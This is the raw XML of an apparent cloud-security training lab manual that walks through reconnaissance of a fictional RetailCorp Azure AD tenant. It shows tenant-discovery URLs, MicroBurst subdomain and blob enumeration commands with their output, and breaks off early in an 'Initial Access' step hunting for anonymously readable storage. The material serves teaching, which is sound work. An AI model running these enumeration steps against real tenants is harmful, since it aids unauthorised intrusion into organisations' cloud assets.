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FBB156" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="25396F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="25396F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lab Manual</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CF1D91" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>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Please note that the below walkthrough assumes that you have seen the video session of the class and have the attack VM and attack tenant properly setup as detailed in the 'Lab Prerequisites' section!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38ADF7C0" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="435EBE"/>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050663CF" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:before="30" w:after="0" w:line="300" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>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We just know the name of the target organization - RetailCorp. Let us check if the target organization is using Azure AD! We can use the following URL to get some details! Note that here we are assuming that Retailcorp is using the domain name that is automatically assigned in Azure based on the tenant name. In addition, there is no need to know a valid username to use the below URL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612FB49E" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5"/>
        <w:spacing w:before="210" w:after="0" w:line="240" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>https://login.microsoftonline.com/getuserrealm.srf?login=USERNAME@retailcorp.onmicrosoft.com&amp;xml=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3108FB" w14:textId="52BDFF84" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56C24173" wp14:editId="237175B9">
            <wp:extent cx="5943600" cy="21583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2158365"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A32817E" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:before="600" w:after="0" w:line="270" w:lineRule="atLeast"/>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'NameSpaceType' Managed means that the target organization is using Azure!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9E7F70" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:before="240" w:after="0" w:line="270" w:lineRule="atLeast"/>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Next, find out the Tenant ID for retailcorp.onmicrosoft.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618BBC29" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5"/>
        <w:spacing w:before="210" w:after="0" w:line="240" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>https://login.microsoftonline.com/retailcorp.onmicrosoft.com/.well-known/openid-configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BE4DE1" w14:textId="14524A8A" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7555AAE5" wp14:editId="07B70BF4">
            <wp:extent cx="5943600" cy="13601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1360170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BE9A89" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:after="0" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>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We can also use tools like AADInternals (https://github.com/Gerenios/AADInternals) for finding the above!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763B65E3" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:before="285" w:after="0" w:line="270" w:lineRule="atLeast"/>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lastRenderedPageBreak/>
        <w:t>We can use MicroBuster to look for services used by RetailCorp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC0B9C9" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:before="240" w:after="0" w:line="270" w:lineRule="atLeast"/>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Let us first find out the services used by the target tenant:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA44BD4" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9090" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9090"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="14C16F07" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="240"/>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5CFDEEDD"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PS C:\AzAD\Tools&gt; Import-Module C:\AzAD\Tools\MicroBurst\MicroBurst.psm1</w:t>
            </w:r>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
              <w:t>AzureRM module not installed, checking other modules</w:t>
            </w:r>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
              <w:t>MSOnline module not installed, checking other modules</w:t>
            </w:r>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
              <w:t>Imported Misc MicroBurst functions</w:t>
            </w:r>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
              <w:t>Imported Azure REST API MicroBurst functions</w:t>
            </w:r>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5BCD11BE" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:vanish/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9090" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4650"/>
        <w:gridCol w:w="2100"/>
        <w:gridCol w:w="2340"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="7FD98B81" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="240"/>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52E9AAF"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[snip]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="21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7F124A8"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23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9182F41"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r w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="7E19ABFE" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="420"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6750" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57C9CB39"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PS C:\AzAD\Tools&gt; Invoke-EnumerateAzureSubDomains -Base retailcorp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="23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386312E" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="6EC7A879" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="465"/>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9E819E6"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Subdomain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="21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8365251"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Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="23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700A505"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r w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="02AA88AF" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="255"/>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C972D4E" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="225"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c>
          <w:tcPr>
            <w:tcW w:w="21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EB1F336" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="225"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c>
          <w:tcPr>
            <w:tcW w:w="23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BCC2B6C"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r w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="755923E5" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="255"/>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34A48C3"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retailcorp.mail.protection.outlook.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="21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3D63A9B"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Email</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="23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C932E04"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r w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="23EF5304" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="270"/>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7C2FD3A"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retailcorp.onmicrosoft.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="21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E798FC9"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Microsoft Hosted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="23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88DD348"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Domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="4A77265D" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="255"/>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2F507C79" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="225"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retailcorp.blob.core.windows.net</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="21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DC3F464" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="225"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Storage Accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="23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21837047" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="225"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 Blobs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="114B232B" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="255"/>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58079E11"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retailcorp.file.core.windows.net</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="21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747DBAD"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Storage Accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="23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5AC34C18"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 Files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="119E14FF" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="270"/>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A90D20F"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retailcorp.queue.core.windows.net</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="21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0D74E15"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Storage Accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="23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EDB6428"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 Queues</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="35AD2601" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="255"/>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8983288"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retailcorp.table.core.windows.net</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="21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1D77895"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Storage Accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="23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2399245"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 Tables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="71AE3467" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="60"/>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E97C30A" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="60"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21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2F2225D5" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="60"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23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C1235FE" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="60"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bl>
    <w:p w14:paraId="431D392C" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:before="540" w:after="0" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>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The target tenant is using storage accounts! Our next step would be to check if there are any publicly accessible storage accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53271A3C" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="435EBE"/>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Initial Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E26540E" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:before="30" w:after="0" w:line="285" w:lineRule="atLeast"/>
        <w:ind w:firstLine="45"/>
        <w:jc w:val="both"/>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Let's use another function from Microbuster to check if there are any storage accounts with anonymous access. Run the below command in the PowerShell session where you imported MicroBuster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7351E9" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="13500" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="13500"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="0C6BF211" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="240"/>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61A33A8"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PS C:\AzAD\Tools&gt; Invoke-EnumerateAzureBlobs -Base retailcorp</w:t>
            </w:r>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
              <w:t>Found Storage Account - retailcorp.blob.core.windows.net</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="763C8FF7" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2432290E" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:vanish/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="13500" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="13500"/>
      </w:tblGrid>
